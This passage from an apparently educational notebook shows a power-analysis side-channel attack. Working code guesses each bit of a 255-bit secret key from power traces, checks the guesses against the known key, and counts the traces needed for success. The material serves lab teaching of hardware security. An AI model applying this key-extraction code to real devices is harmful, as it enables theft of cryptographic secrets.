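clean = np.array([10.0, -10.0] * 8)  # made-up, well-separated values
noisy = clean.copy()
noisy[5] = 0.5                       # one ambiguous point near the middle
print(decision_margin(clean), decision_margin(noisy))
```

A low margin on your real `sd` suggests that at least one bit decision is close to a coin toss, and that more traces or better points of interest may help.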

In [None]:
def attack(poi, straces, trim=None, verbose=True):
    sd = calc_sumdata(poi, straces, trim=trim)

    # guess all bits from waveform:
    guess = ''
    for i in range(1,255):
        if sd[i] > np.average(sd):
            guess += '0'
        else:
            guess += '1'

    # first and last bit are unknown, so enumerate the possibilities:
    guesses = []
    for first in (['0', '1']):
        for last in (['0', '1']):
            guesses.append(int(first + guess + last, 2))

    kr = regularized_k(k)
    wrong_bits = []
    if kr in guesses:
        if verbose: print('✅ Guessed right!')
    else:
        for kbit in range(1,255):  # check all 254 guessed bits (guess[0]..guess[253])
            if int(guess[kbit-1]) != ((kr >> (255-kbit)) & 1):
                wrong_bits.append(255-kbit)
        if verbose:
            print('Attack failed.')
            print('Guesses: %s' % hex(guesses[0]))
            print('         %s' % hex(guesses[1]))
            print('         %s' % hex(guesses[2]))
            print('         %s' % hex(guesses[3]))
            print('Correct: %s' % hex(kr))
            print('%d wrong bits' % len(wrong_bits))
    return wrong_bits

The moment of truth:

In [None]:
attack(poi, ptraces)

Let's see how many traces are needed to correctly guess the key:

In [None]:
for attack_traces in range(1, len(ptraces)+1):
    print('Attacking with %d traces... ' % attack_traces,  end='')
    wrong_bits = attack(poi, ptraces[:attack_traces], None, False)
    if wrong_bits:
        print('failed, %d wrong bits' % len(wrong_bits))
    else:
        print('passed ✅')

The attack should succeed with as few as 15 traces; what's even more impressive is that most bits are guessed correctly with just a single trace.